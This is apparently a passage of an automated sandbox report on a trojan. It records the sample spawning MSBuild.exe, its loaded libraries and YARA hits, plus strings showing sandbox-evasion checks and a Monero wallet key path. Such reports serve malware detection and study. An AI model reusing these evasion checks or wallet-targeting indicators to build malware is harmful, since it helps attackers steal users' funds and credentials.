                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041C5853_2_0041C585
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041B8253_2_0041B825
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042DA533_2_0042DA53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042D2E33_2_0042D2E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042CE4E3_2_0042CE4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041961D3_2_0041961D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042DE3B3_2_0042DE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042D6813_2_0042D681
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004047E8 appears 38 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00410609 appears 71 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004104E7 appears 38 times
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: String function: 00DC7B80 appears 49 times
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
                        Source: lCVFGKfczi.exe, 00000000.00000000.1669136204.0000000000E50000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameproquota.exej% vs lCVFGKfczi.exe
                        Source: lCVFGKfczi.exeBinary or memory string: OriginalFilenameproquota.exej% vs lCVFGKfczi.exe
                        Source: lCVFGKfczi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: lCVFGKfczi.exeStatic PE information: Section: .data ZLIB complexity 0.9919471153846153
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@9/10@1/1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,3_2_004114A5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,VariantClear,3_2_00411807
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AZZQ6A01.htmJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7404
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                        Source: lCVFGKfczi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: lCVFGKfczi.exeReversingLabs: Detection: 36%
                        Source: unknownProcess created: C:\Users\user\Desktop\lCVFGKfczi.exe "C:\Users\user\Desktop\lCVFGKfczi.exe"
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: lCVFGKfczi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: lCVFGKfczi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: lCVFGKfczi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: lCVFGKfczi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: lCVFGKfczi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: lCVFGKfczi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: lCVFGKfczi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042594E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0042594E
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC71AD push ecx; ret 0_2_00DC71C0
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1C13A push ecx; ret 0_2_00E1C14D
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1C2D8 push ds; retn 0003h0_2_00E1C38D
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1C39E push ds; retn 0003h0_2_00E1C38D
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1C454 push ds; retf 0003h0_2_00E1C455
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1E9ED push 0000004Ch; iretd 0_2_00E1E9FE
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E0ADAD push ecx; ret 0_2_00E0ADC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042F262 push ecx; ret 3_2_0042F275
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00422E59 push esi; ret 3_2_00422E5B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041DED5 push ecx; ret 3_2_0041DEE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
                        Source: lCVFGKfczi.exe, MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                        Source: lCVFGKfczi.exe, MSBuild.exeBinary or memory string: SBIEDLL.DLL
                        Source: lCVFGKfczi.exe, MSBuild.exeBinary or memory string: API_LOG.DLL
                        Source: MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeAPI coverage: 4.0 %
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DD9ABF FindFirstFileExW,0_2_00DD9ABF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,3_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00410FBA GetSystemInfo,3_2_00410FBA
                        Source: Amcache.hve.6.drBinary or memory string: VMware
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
                        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
